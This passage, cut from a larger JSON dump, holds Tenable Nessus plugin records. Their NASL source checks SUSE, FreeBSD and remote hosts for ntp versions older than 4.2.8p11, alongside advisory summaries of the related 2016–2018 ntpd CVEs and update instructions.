It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debuginfo-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debugsource-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-doc-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p11-64.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T02:55:13", "description": "Network Time Foundation reports :\n\nThe NTP Project at Network Time Foundation is releasing ntp-4.2.8p11.\n\nThis release addresses five security issues in ntpd :\n\n- LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil\nvulnerability: ephemeral association attack\n\n- INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909 : ctl_getitem():\nbuffer read overrun leads to undefined behavior and information leak\n\n- LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\nephemeral associations\n\n- LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric\nmode cannot recover from bad state\n\n- LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / 
VU#961909 : Unauthenticated\npacket can reset authenticated interleaved association\n\none security issue in ntpq :\n\n- MEDIUM: Sec 3414 / CVE-2018-7183 / VU#961909 : ntpq:decodearr() can\nwrite beyond its buffer limit\n\nand provides over 33 bugfixes and 32 other improvements.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-28T00:00:00", "title": "FreeBSD : ntp -- multiple vulnerabilities (af485ef4-1c58-11e8-8477-d05099c0ae8c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ntp-devel", "p-cpe:/a:freebsd:freebsd:ntp"], "id": "FREEBSD_PKG_AF485EF41C5811E88477D05099C0AE8C.NASL", "href": "https://www.tenable.com/plugins/nessus/107046", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107046);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_xref(name:\"FreeBSD\", value:\"SA-18:02.ntp\");\n\n script_name(english:\"FreeBSD : ntp -- multiple vulnerabilities (af485ef4-1c58-11e8-8477-d05099c0ae8c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Network Time Foundation reports :\n\nThe NTP Project at Network Time Foundation is releasing ntp-4.2.8p11.\n\nThis release addresses five 
security issues in ntpd :\n\n- LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil\nvulnerability: ephemeral association attack\n\n- INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909 : ctl_getitem():\nbuffer read overrun leads to undefined behavior and information leak\n\n- LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\nephemeral associations\n\n- LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric\nmode cannot recover from bad state\n\n- LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909 : Unauthenticated\npacket can reset authenticated interleaved association\n\none security issue in ntpq :\n\n- MEDIUM: Sec 3414 / CVE-2018-7183 / VU#961909 : ntpq:decodearr() can\nwrite beyond its buffer limit\n\nand provides over 33 bugfixes and 32 other improvements.\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?706c32c8\"\n );\n # https://vuxml.freebsd.org/freebsd/af485ef4-1c58-11e8-8477-d05099c0ae8c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ab8935d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.8p11\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ntp-devel>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:45:47", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. 
(bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\n - Fix systemd migration in %pre (bsc#1034892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "title": "SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1464-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-1464-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110224", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1464-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110224);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1464-1)\");\n script_summary(english:\"Checks rpm output 
for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\n - Fix systemd migration in %pre (bsc#1034892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181464-1/\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e3d0c93\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1000=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-4.2.8p11-46.26.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-debuginfo-4.2.8p11-46.26.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-debugsource-4.2.8p11-46.26.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-doc-4.2.8p11-46.26.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T04:20:14", "description": "The version of the remote NTP server is 4.x prior to 4.2.8p11. It is,\ntherefore, affected by multiple vulnerabilities, which allow denial of\nservice attacks, information disclosure and possibly, remote code\nexecution.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-09T00:00:00", "title": "Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p11 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ntp:ntp"], "id": "NTP_4_2_8P11.NASL", "href": "https://www.tenable.com/plugins/nessus/107258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107258);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\n \"CVE-2016-1549\",\n \"CVE-2018-7170\",\n \"CVE-2018-7182\",\n \"CVE-2018-7183\",\n \"CVE-2018-7184\",\n \"CVE-2018-7185\"\n 
);\n script_bugtraq_id(\n 88200,\n 103191,\n 103192,\n 103194,\n 103339\n );\n\n script_name(english:\"Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for a vulnerable NTP server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NTP server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote NTP server is 4.x prior to 4.2.8p11. It is,\ntherefore, affected by multiple vulnerabilities, which allow denial of\nservice attacks, information disclosure and possibly, remote code\nexecution.\");\n # https://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eda86736\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to NTP version 4.2.8p11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7183\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Make sure NTP server is running\nget_kb_item_or_exit('NTP/Running');\n\napp_name = \"NTP Server\";\n\nport = get_kb_item(\"Services/udp/ntp\");\nif (empty_or_null(port)) port = 123;\n\nversion = get_kb_item_or_exit(\"Services/ntp/version\");\nif (version == 'unknown') audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\nmatch = pregmatch(string:version, pattern:\"([0-9a-z.]+)\");\nif (isnull(match) || empty_or_null(match[1])) audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\n# Paranoia check\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = match[1];\nverfields = split(ver, sep:\".\", keep:FALSE);\nmajor = int(verfields[0]);\nminor = int(verfields[1]);\nif ('p' >< verfields[2])\n{\n revpatch = split(verfields[2], sep:\"p\", keep:FALSE);\n rev = int(revpatch[0]);\n patch = int(revpatch[1]);\n}\nelse\n{\n rev = verfields[2];\n patch = 0;\n}\n\n# This vulnerability affects NTP 4.x < 4.2.8p11\n# Check for vuln, else audit out.\nif (\n (major == 4 && minor < 2) ||\n (major == 4 && minor == 2 && rev < 8) ||\n (major == 4 && minor == 2 && rev == 8 && patch < 11)\n)\n{\n fix = \"4.2.8p11\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n\nreport =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\nsecurity_report_v4(\n port : port,\n proto : \"udp\",\n extra : report,\n severity : SECURITY_HOLE\n);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:12:06", "description": "New ntp packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security 
